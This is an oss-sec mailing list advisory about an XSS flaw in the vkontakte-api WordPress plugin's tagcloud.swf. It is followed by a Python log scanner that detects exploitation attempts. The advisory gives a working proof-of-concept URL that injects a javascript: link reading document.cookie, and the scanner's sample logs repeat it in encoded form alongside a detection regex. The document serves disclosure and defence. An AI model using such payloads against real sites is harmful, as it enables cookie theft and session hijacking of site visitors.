oss-sec mailing list archives

CVE-2009-4168: WordPress plugin vkontakte-api XSS vulnerability


From: Henri Salo <henri () nerv fi>
Date: Mon, 11 Mar 2013 09:44:33 +0200

Hello list members,

Plugin URL: http://wordpress.org/extend/plugins/vkontakte-api/
Affected file: tagcloud.swf 368b01e1728111f99d93ac5805d97abbb899a910
PoC: 
wp-content/plugins/vkontakte-api/swf/tagcloud.swf?mode=tags&tagcloud=<tags><a+href=%27javascript:alert%28document.cookie%29%27+style=%27font-size:+40pt%27>oss-security</a></tags>
Affected versions: 1.21, 1.22, 1.23, 1.24, 1.25, 1.26, 1.27, 2.0, 2.1, 2.2, 2.3, 2.4, 2.5, 2.7

Currently no fix available.

--
Henri Salo

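As an added detection example (not part of Henri's post or of the plugin's code): a scanner over web server access logs that flags requests to the affected tagcloud.swf whose tagcloud parameter carries script markup of the kind shown in the PoC. The path and parameter names come from the advisory; the log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Path of the vulnerable Flash file named in the advisory.
TAGCLOUD_PATH = "/wp-content/plugins/vkontakte-api/swf/tagcloud.swf"

# Markup a legitimate tag cloud never needs: script URIs, inline event
# handlers or script elements inside the XML passed via ?tagcloud=.
DANGEROUS = re.compile(r"javascript:|vbscript:|on\w+\s*=|<script", re.IGNORECASE)

# Minimal parser for Apache/nginx combined log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample log lines (not real traffic): one attempt modelled on the
# advisory's PoC, one benign tag cloud, one unrelated request.
SAMPLE_LOG = [
    '203.0.113.5 - - [11/Mar/2013:09:44:33 +0200] "GET /wp-content/plugins/vkontakte-api/swf/'
    'tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href%3D%27javascript:alert%28document.cookie'
    '%29%27%3Ex%3C/a%3E%3C/tags%3E HTTP/1.1" 200 5120',
    '198.51.100.7 - - [11/Mar/2013:09:45:01 +0200] "GET /wp-content/plugins/vkontakte-api/swf/'
    'tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href%3D%27/tag/php%27%3Ephp%3C/a%3E%3C/tags%3E'
    ' HTTP/1.1" 200 5120',
    '198.51.100.7 - - [11/Mar/2013:09:45:02 +0200] "GET /?s=javascript: HTTP/1.1" 200 8800',
]

def is_tagcloud_exploit(url: str) -> bool:
    """True when the request targets tagcloud.swf and ?tagcloud= carries script markup."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith(TAGCLOUD_PATH):
        return False
    qs = parse_qs(parts.query, keep_blank_values=True)
    for value in qs.get("tagcloud", []):
        # parse_qs already decoded once; decode again to catch double-encoding.
        if DANGEROUS.search(unquote(value)):
            return True
    return False

def scan_log(lines):
    """Return (client_ip, request_url) for every line matching the exploit pattern."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_tagcloud_exploit(m.group("url")):
            hits.append((m.group("ip"), m.group("url")))
    return hits

if __name__ == "__main__":
    for ip, url in scan_log(SAMPLE_LOG):
        print(f"possible CVE-2009-4168 exploitation attempt from {ip}: {url}")
```

Blocking or removing the swf file on sites running an affected version is the practical mitigation while no fix is available; the scanner above only shows whether anyone has already tried the parameter.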